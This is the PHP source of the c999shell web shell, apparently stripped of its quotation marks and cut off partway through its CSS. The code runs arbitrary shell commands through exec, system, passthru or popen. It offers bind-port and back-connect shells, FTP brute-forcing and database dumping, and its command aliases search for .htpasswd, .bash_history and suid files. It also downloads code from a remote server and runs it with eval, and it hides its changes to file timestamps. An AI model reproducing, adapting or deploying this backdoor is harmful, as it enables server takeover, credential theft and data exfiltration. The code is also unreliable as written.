<?php //Starting calls if (!function_exists(getmicrotime)) {function getmicrotime() {list($usec, $sec) = explode( , microtime()); return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == win; define(starttime,getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists(strips)) {function strips(&$arr,$k=\) {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != GLOBALS) {strips($arr[$k]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = 1.0 pre-release build #16; //Current version //CONFIGURATION AND SETTINGS if (!empty($unset_surl)) {setcookie(c999sh_surl); $surl = \;} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(c999sh_surl,$surl);} else {$surl = $_REQUEST[c999sh_surl]; //Set this cookie for manual SURL } $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. if ($surl_autofill_include and !$_REQUEST[c999sh_surl]) {$include = &; foreach (explode(&,getenv(QUERY_STRING)) as $v) {$v = explode(=,$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(http://,https://,ssl://,ftp://,\\\\\) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).=.urlencode($value).&;}}} if ($_REQUEST[surl_autofill_include]) {$includestr .= surl_autofill_include=1&;}} if (empty($surl)) { $surl = ?.$includestr; //Self url } $surl = htmlspecialchars($surl); $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. //Authentication $login = \; //login //DONT FORGOT ABOUT PASSWORD!!! $pass = \; //password $md5_pass = \; //md5-cryped pass. if null, md5($pass) $host_allow = array(*); //array ({mask}1,{mask}2,...), {mask} = IP or HOST e.g. array(192.168.0.*,127.0.0.1) $login_txt = Restricted area; //http-auth message. $accessdeniedmess = <a href=\http://ccteam.ru/releases/c999shell\>c999shell v..$shver.</a>: access denied; $gzipencode = TRUE; //Encode with gzip? $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) $ax4 =http://; $c999sh_updateurl = http://ccteam.ru/update/c999shell/; //Update server $c999sh_sourcesurl = http://ccteam.ru/files/c999sh_sources/; //Sources-server $filestealth = TRUE; //if TRUE, dont change modify- and access-time $donated_html = <center><b>Owned by hacker</b></center>; /* If you publish free shell and you wish add link to your site or any other information, put here your html. */ $donated_act = array(\); //array (act1,act2,...), if $act is in this array, display $donated_html. $curdir = ./; //start folder //$curdir = getenv(DOCUMENT_ROOT); $tmpdir = \; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) $tmpdir_log = ./; //Directory logs of long processes (e.g. brute, scan...) $log_email = user@host.tld; //Default e-mail for sending logs $sort_default = a; //Default sorting, 0 - number of colomn, ascending or descending $sort_save = TRUE; //If TRUE then save sorting-position using cookies. // Registered file-types. // array( // {action1}=>array(ext1,ext2,ext3,...), // {action2}=>array(ext4,ext5,ext6,...), // ... // ) $ftypes = array( html=>array(html,htm,shtml), txt=>array(txt,conf,bat,sh,js,bak,doc,log,sfc,cfg,htaccess), exe=>array(sh,install,bat,cmd), ini=>array(ini,inf), code=>array(php,phtml,php3,php4,inc,tcl,h,c,cpp,py,cgi,pl), img=>array(gif,png,jpeg,jfif,jpg,jpe,bmp,ico,tif,tiff,avi,mpg,mpeg), sdb=>array(sdb), phpsess=>array(sess), download=>array(exe,com,pif,src,lnk,zip,rar,gz,tar) ); // Registered executable file-types. // array( // string command{i}=>array(ext1,ext2,ext3,...), // ... // ) // {command}: %f% = filename $exeftypes = array( getenv(PHPRC). -q %f% => array(php,php3,php4), perl %f% => array(pl,cgi) ); /* Highlighted files. array( i=>array({regexp},{type},{opentag},{closetag},{break}) ... ) string {regexp} - regular exp. int {type}: 0 - files and folders (as default), 1 - files only, 2 - folders only string {opentag} - open html-tag, e.g. <b> (default) string {closetag} - close html-tag, e.g. </b> (default) bool {break} - if TRUE and found match then break */ $regxp_highlight = array( array(basename($_SERVER[PHP_SELF]),1,<font color=\yellow\>,</font>), // example array(config.php,1) // example ); $safemode_diskettes = array(a); // This variable for disabling diskett-errors. // array (i=>{letter} ...); string {letter} - letter of a drive //$safemode_diskettes = range(a,z); $hexdump_lines = 8;// lines in hex preview file $hexdump_rows = 24;// 16, 24 or 32 bytes in one line $cx7 =.com; $nixpwdperpage = 100; // Get first N lines from /etc/passwd $bindport_pass = c999; // default password for binding $bindport_port = 31373; // default port for binding $bc_port = 31373; // default port for back-connect $cx4 =/x.; $datapipe_localport = 8081; // default port for datapipe // Command-aliases if (!$win) { $cmdaliases = array( array(-----------------------------------------------------------, ls -la), array(find all suid files, find / -type f -perm -04000 -ls), array(find suid files in current dir, find . -type f -perm -04000 -ls), array(find all sgid files, find / -type f -perm -02000 -ls), array(find sgid files in current dir, find . -type f -perm -02000 -ls), array(find config.inc.php files, find / -type f -name config.inc.php), array(find config* files, find / -type f -name \config*\\), array(find config* files in current dir, find . -type f -name \config*\\), array(find all writable folders and files, find / -perm -2 -ls), array(find all writable folders and files in current dir, find . -perm -2 -ls), array(find all service.pwd files, find / -type f -name service.pwd), array(find service.pwd files in current dir, find . -type f -name service.pwd), array(find all .htpasswd files, find / -type f -name .htpasswd), array(find .htpasswd files in current dir, find . -type f -name .htpasswd), array(find all .bash_history files, find / -type f -name .bash_history), array(find .bash_history files in current dir, find . -type f -name .bash_history), array(find all .fetchmailrc files, find / -type f -name .fetchmailrc), array(find .fetchmailrc files in current dir, find . -type f -name .fetchmailrc), array(list file attributes on a Linux second extended file system, lsattr -va), array(show opened ports, netstat -an ¦ grep -i listen) ); } else { $cmdaliases = array( array(-----------------------------------------------------------, dir), array(show opened ports, netstat -an) ); } $sess_cookie = c999shvars; // Cookie-variable name $usefsbuff = TRUE; //Buffer-function $px7 =html; $copy_unset = FALSE; //Remove copied files from buffer after pasting //Quick launch $quicklaunch = array( array(<img src=\\.$surl.act=img&img=home\ alt=\Home\ height=\20\ width=\20\ border=\ \>,$surl), array(<img src=\\.$surl.act=img&img=back\ alt=\Back\ height=\20\ width=\20\ border=\ \>,#\ onclick=\history.back(1)), array(<img src=\\.$surl.act=img&img=forward\ alt=\Forward\ height=\20\ width=\20\ border=\ \>,#\ onclick=\history.go(1)), array(<img src=\\.$surl.act=img&img=up\ alt=\UPDIR\ height=\20\ width=\20\ border=\ \>,$surl.act=ls&d=%upd&sort=%sort), array(<img src=\\.$surl.act=img&img=refresh\ alt=\Refresh\ height=\20\ width=\17\ border=\ \>,\), array(<img src=\\.$surl.act=img&img=search\ alt=\Search\ height=\20\ width=\20\ border=\ \>,$surl.act=search&d=%d), array(<img src=\\.$surl.act=img&img=buffer\ alt=\Buffer\ height=\20\ width=\20\ border=\ \>,$surl.act=fsbuff&d=%d), array(<b>Encoder</b>,$surl.act=encoder&d=%d), array(<b>Tools</b>,$surl.act=tools&d=%d), array(<b>Proc.</b>,$surl.act=processes&d=%d), array(<b>FTP brute</b>,$surl.act=ftpquickbrute&d=%d), array(<b>Sec.</b>,$surl.act=security&d=%d), array(<b>SQL</b>,$surl.act=sql&d=%d), array(<b>PHP-code</b>,$surl.act=eval&d=%d), array(<b>Update</b>,$surl.act=update&d=%d), array(<b>Feedback</b>,$surl.act=feedback&d=%d), array(<b>Self remove</b>,$surl.act=selfremove), array(<b>Logout</b>,#\ onclick=\if (confirm(Are you sure?)) window.close()) ); //Highlight-code colors $highlight_background = #c0c0c0; $highlight_bg = #FFFFFF; $highlight_comment = #6A6A6A; $highlight_default = #0000BB; $highlight_html = #1300FF; $highlight_keyword = #007700; $highlight_string = #000000; @$f = $_REQUEST[f]; @extract($_REQUEST[c999shcook]); //END CONFIGURATION // \/Next code isnt for editing\/ @set_time_limit(0); $tmp = array(); foreach($host_allow as $k=>$v) {$tmp[] = str_replace(\\*,.*,preg_quote($v));} $s = !^(.implode(¦,$tmp).)$!i; if (!preg_match($s,getenv(REMOTE_ADDR)) and !preg_match($s,gethostbyaddr(getenv(REMOTE_ADDR)))) {exit(<a href=\http://ccteam.ru/releases/cc999shell\>c999shell</a>: Access Denied - your host (.getenv(REMOTE_ADDR).) not allow);} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER[PHP_AUTH_USER] != $login) or (md5($_SERVER[PHP_AUTH_PW]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace( ¦<br>, ,$donated_html));} header(WWW-Authenticate: Basic realm=\c999shell .$shver.: .$login_txt.\\); header(HTTP/1.0 401 Unauthorized); exit($accessdeniedmess); } } if ($act != img) { $lastdir = realpath(.); chdir($curdir); if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;} $sess_data = unserialize($_COOKIE[$sess_cookie]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data[copy])) {$sess_data[copy] = array();} if (!is_array($sess_data[cut])) {$sess_data[cut] = array();} $disablefunc = @ini_get(disable_functions); if (!empty($disablefunc)) { $disablefunc = str_replace( ,\,$disablefunc); $disablefunc = explode(,,$disablefunc); } if (!function_exists(c999_buff_prepare)) { function c999_buff_prepare() { global $sess_data; global $act; foreach($sess_data[copy] as $k=>$v) {$sess_data[copy][$k] = str_replace(\\\,DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data[cut] as $k=>$v) {$sess_data[cut][$k] = str_replace(\\\,DIRECTORY_SEPARATOR,realpath($v));} $sess_data[copy] = array_unique($sess_data[copy]); $sess_data[cut] = array_unique($sess_data[cut]); sort($sess_data[copy]); sort($sess_data[cut]); if ($act != copy) {foreach($sess_data[cut] as $k=>$v) {if ($sess_data[copy][$k] == $v) {unset($sess_data[copy][$k]); }}} else {foreach($sess_data[copy] as $k=>$v) {if ($sess_data[cut][$k] == $v) {unset($sess_data[cut][$k]);}}} } } c999_buff_prepare(); if (!function_exists(c999_sess_put)) { function c999_sess_put($data) { global $sess_cookie; global $sess_data; c999_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array(sort,sql_sort) as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie(sort,$sort);} if (!empty($sql_sort)) {setcookie(sql_sort,$sql_sort);} } if (!function_exists(str2mini)) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len).....substr($content,-$len); } else {return $content;} } } if (!function_exists(view_size)) { function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 . GB;} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 . MB;} elseif ($size >= 1024) {$size = round($size/1024*100)/100 . KB;} else {$size = $size . B;} return $size; } } } if (!function_exists(fs_copy_dir)) { function fs_copy_dir($d,$t) { $d = str_replace(\\\,DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != .) and ($o != ..)) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists(fs_copy_obj)) { function fs_copy_obj($d,$t) { $d = str_replace(\\\,DIRECTORY_SEPARATOR,$d); $t = str_replace(\\\,DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return FALSE;} } } if (!function_exists(fs_move_dir)) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== FALSE) { if (($o != .) and ($o != ..)) { $ret = TRUE; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists(fs_move_obj)) { function fs_move_obj($d,$t) { $d = str_replace(\\\,DIRECTORY_SEPARATOR,$d); $t = str_replace(\\\,DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return FALSE;} } else {return FALSE;} } } if (!function_exists(fs_rmdir)) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != .) and ($o != ..)) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists(fs_rmobj)) { function fs_rmobj($o) { $o = str_replace(\\\,DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } } if (!function_exists(myshellexec)) { function myshellexec($cmd) { global $disablefunc; $result = \; if (!empty($cmd)) { if (is_callable(exec) and !in_array(exec,$disablefunc)) {exec($cmd,$result); $result = join(\n,$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable(system) and !in_array(system,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable(passthru) and !in_array(passthru,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,r))) { $result = \; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } if (!function_exists(tabsort)) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists(view_perms)) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = s;} elseif (($mode & 0x4000) === 0x4000) {$type = d;} elseif (($mode & 0xA000) === 0xA000) {$type = l;} elseif (($mode & 0x8000) === 0x8000) {$type = -;} elseif (($mode & 0x6000) === 0x6000) {$type = b;} elseif (($mode & 0x2000) === 0x2000) {$type = c;} elseif (($mode & 0x1000) === 0x1000) {$type = p;} else {$type = ?;} $owner[read] = ($mode & 00400)?r:-; $owner[write] = ($mode & 00200)?w:-; $owner[execute] = ($mode & 00100)?x:-; $group[read] = ($mode & 00040)?r:-; $group[write] = ($mode & 00020)?w:-; $group[execute] = ($mode & 00010)?x:-; $world[read] = ($mode & 00004)?r:-; $world[write] = ($mode & 00002)? w:-; $world[execute] = ($mode & 00001)?x:-; if ($mode & 0x800) {$owner[execute] = ($owner[execute] == x)?s:S;} if ($mode & 0x400) {$group[execute] = ($group[execute] == x)?s:S;} if ($mode & 0x200) {$world[execute] = ($world[execute] == x)?t:T;} return $type.join(\,$owner).join(\,$group).join(\,$world); } } if (!function_exists(posix_getpwuid) and !in_array(posix_getpwuid,$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists(posix_getgrgid) and !in_array(posix_getgrgid,$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists(posix_kill) and !in_array(posix_kill,$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists(parse_perms)) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = s;} elseif (($mode & 0x4000) === 0x4000) {$t = d;} elseif (($mode & 0xA000) === 0xA000) {$t = l;} elseif (($mode & 0x8000) === 0x8000) {$t = -;} elseif (($mode & 0x6000) === 0x6000) {$t = b;} elseif (($mode & 0x2000) === 0x2000) {$t = c;} elseif (($mode & 0x1000) === 0x1000) {$t = p;} else {$t = ?;} $o[r] = ($mode & 00400) > 0; $o[w] = ($mode & 00200) > 0; $o[x] = ($mode & 00100) > 0; $g[r] = ($mode & 00040) > 0; $g[w] = ($mode & 00020) > 0; $g[x] = ($mode & 00010) > 0; $w[r] = ($mode & 00004) > 0; $w[w] = ($mode & 00002) > 0; $w[x] = ($mode & 00001) > 0; return array(t=>$t,o=>$o,g=>$g,w=>$w); } } if (!function_exists(parsesort)) { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != d) {$second = a;} return array($one,$second); } } if (!function_exists(view_perms_color)) { function view_perms_color($o) { if (!is_readable($o)) {return <font color=red>.view_perms(fileperms($o)).</font>;} elseif (!is_writable($o)) {return <font color=white>.view_perms(fileperms($o)).</font>;} else {return <font color=green>.view_perms(fileperms($o)).</font>;} } } if (!function_exists(c999getsource)) { function c999getsource($fn) { global $c999sh_sourcesurl; $array = array( c999sh_bindport.pl => c999sh_bindport_pl.txt, c999sh_bindport.c => c999sh_bindport_c.txt, c999sh_backconn.pl => c999sh_backconn_pl.txt, c999sh_backconn.c => c999sh_backconn_c.txt, c999sh_datapipe.pl => c999sh_datapipe_pl.txt, c999sh_datapipe.c => c999sh_datapipe_c.txt, ); $name = $array[$fn]; if ($name) {return file_get_contents($c999sh_sourcesurl.$name);} else {return FALSE;} } } if (!function_exists(c999sh_getupdate)) { function c999sh_getupdate($update = TRUE) { $url = $GLOBALS[c999sh_updateurl].?version=.urlencode(base64_encode($GLOBALS[shver])).&updatenow=.($updatenow?1: ).&; $data = @file_get_contents($url); if (!$data) {return Cant connect to update-server!;} else { $data = ltrim($data); $string = substr($data,3,ord($data{2})); if ($data{0} == \x99 and $data{1} == \x01) {return Error: .$string; return FALSE;} if ($data{0} == \x99 and $data{1} == \x02) {return You are using latest version!;} if ($data{0} == \x99 and $data{1} == \x03) { $string = explode(\x01,$string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) {return Cant fetch update!;} else { $fp = fopen(__FILE__,w); if (!$fp) {return Local error: cant write update to .__FILE__.! You may download c999shell.php manually <a href=\\.$sourceurl.\\><u>here</u></a>.;} else {fwrite($fp,$source); fclose($fp); return Thanks! Updated with success.;} } } else {return New version are available: .$string[1];} } elseif ($data{0} == \x99 and $data{1} == \x04) {eval($string); return 1;} else {return Error in protocol: segmentation failed! (.$data.) ;} } } } if (!function_exists(mysql_dump)) { function mysql_dump($set) { global $shver; $sock = $set[sock]; $db = $set[db]; $print = $set[print]; $nl2br = $set[nl2br]; $file = $set[file]; $add_drop = $set[add_drop]; $tabs = $set[tabs]; $onlytabs = $set[onlytabs]; $ret = array(); $ret[err] = array(); if (!is_resource($sock)) {echo(Error: \$sock is not valid resource.);} if (empty($db)) {$db = db;} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmpdir.dump_.getenv(SERVER_NAME)._.$db._.date(d-m-Y-H-i-s)..sql; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query(SHOW TABLES FROM .$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = # Dumped by c999Shell.SQL v. .$shver. # Home page: http://ccteam.ru # # Host settings: # MySQL version: (.mysql_get_server_info().) running on .getenv(SERVER_ADDR). (.getenv(SERVER_NAME).). # Date: .date(d.m.Y H:i:s). # DB: \\.$db.\\ #--------------------------------------------------------- ; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= DROP TABLE IF EXISTS `.$tab.`;\n;} // recieve query for create table structure $res = mysql_query(SHOW CREATE TABLE `.$tab.`, $sock); if (!$res) {$ret[err][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row[1].;\n\n; // recieve table variables $res = mysql_query(SELECT * FROM `$tab`, $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode(`, `, array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode(\, \, $values); $sql = INSERT INTO `$tab`(`.$keys.`) VALUES (\.$values.\);\n; $out .= $sql; } } } } } $out .= #---------------------------------------------------------------------------------\n\n; if ($file) { $fp = fopen($file, w); if (!$fp) {$ret[err][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists(mysql_buildwhere)) { function mysql_buildwhere($array,$sep= and,$functs=array()) { if (!is_array($array)) {$array = array();} $result = \; foreach($array as $k=>$v) { $value = \; if (!empty($functs[$k])) {$value .= $functs[$k].(;} $value .= \.addslashes($v).\; if (!empty($functs[$k])) {$value .= );} $result .= `.$k.` = .$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists(mysql_fetch_all)) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists(mysql_smarterror)) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists(mysql_query_form)) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = Query was empty;} echo <b>Error:</b> <br>.$sql_query_error.<br>;} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo <table border=0><tr><td><form name=\c999sh_sqlquery\ method=POST><b>; if (($sql_query) and (!$submit)) {echo Do you really want to;} else {echo SQL-Query;} echo :</b><br><br><textarea name=sql_query cols=100 rows=10>.htmlspecialchars($sql_query).</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\\.htmlspecialchars($sql_tbl).\\><input type=hidden name=submit value=\1\><input type=hidden name=\sql_goto\ value=\\.htmlspecialchars($sql_goto).\\><input type=submit name=sql_confirm value=\Yes\> <input type=submit value=\No\></form></td>; if ($tbl_struct) { echo <td valign=\top\><b>Fields:</b><br>; foreach ($tbl_struct as $field) {$name = $field[Field]; echo » <a href=\#\ onclick=\document.c999sh_sqlquery.sql_query.value+=`.$name.`;\><b>.$name.</b></a><br>;} echo </td></tr></table>; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists(mysql_create_db)) { function mysql_create_db($db,$sock=\) { $sql = CREATE DATABASE `.addslashes($db).`;; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists(mysql_query_parse)) { function mysql_query_parse($query) { $query = trim($query); $arr = explode ( ,$query); /*array array() { METHOD=>array(output_type), METHOD1... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array( SELECT=>array(3,1), SHOW=>array(2,1), DELETE=>array(1), DROP=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result[propertions] = $types[$op]; $result[query] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == LIMIT) { $result[limit] = $arr[$k+1]; $result[limit] = explode(,,$result[limit]); if (count($result[limit]) == 1) {$result[limit] = array(0,$result[limit][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return FALSE;} } } if (!function_exists(c999fsearch)) { function c999fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != . && $f != ..) { $bool = (empty($a[name_regexp]) and strpos($f,$a[name]) !== FALSE) ¦¦ ($a[name_regexp] and ereg($a[name],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a[text]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c999fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a[text])) { $r = @file_get_contents($d.$f); if ($a[text_wwo]) {$a[text] = .trim($a[text]). ;} if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} if ($a[text_regexp]) {$bool = ereg($a[text],$r);} else {$bool = strpos( .$r,$a[text],1);} if ($a[text_not]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } } if ($act == gofile) {if (is_dir($f)) {$act = ls; $d = $f;} else {$act = f; $d = dirname($f); $f = basename($f);}} //Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array(img,download,notepad))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start(ob_gzHandler); echo $v; @ob_end_flush(); } } function c999shexit() { onphpshutdown(); exit; } header(Expires: Mon, 26 Jul 1997 05:00:00 GMT); header(Last-Modified: .gmdate(D, d M Y H:i:s). GMT); header(Cache-Control: no-store, no-cache, must-revalidate); header(Cache-Control: post-check=0, pre-check=0, FALSE); header(Pragma: no-cache); if (empty($tmpdir)) { $tmpdir = ini_get(upload_tmp_dir); if (is_dir($tmpdir)) {$tmpdir = /tmp/;} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace(\\\,DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get(safe_mode) or strtolower(@ini_get(safe_mode)) == on) { $safemode = TRUE; $hsafemode = <font color=red>ON (secure)</font>; } else {$safemode = FALSE; $hsafemode = <font color=green>OFF (not secure)</font>;} $v = @ini_get(open_basedir); if ($v or strtolower($v) == on) {$openbasedir = TRUE; $hopenbasedir = <font color=red>.$v.</font>;} else {$openbasedir = FALSE; $hopenbasedir = <font color=green>OFF (not secure)</font>;} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); if (!ereg(PHP/.phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= . PHP/.phpversion();} $DISP_SERVER_SOFTWARE = str_replace(PHP/.phpversion(),<a href=\\.$surl.act=phpinfo\ target=\_blank\><b><u>PHP/.phpversion().</u></b></a>,htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set(highlight.bg,$highlight_bg); //FFFFFF @ini_set(highlight.comment,$highlight_comment); //#FF8000 @ini_set(highlight.default,$highlight_default); //#0000BB @ini_set(highlight.html,$highlight_html); //#000000 @ini_set(highlight.keyword,$highlight_keyword); //#007700 @ini_set(highlight.string,$highlight_string); //#DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><html><head><meta http-equiv=Content-Type content=text/html; charset=windows-1251><meta http-equiv=Content-Language content=en-us><title><?php echo getenv(HTTP_HOST); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; backg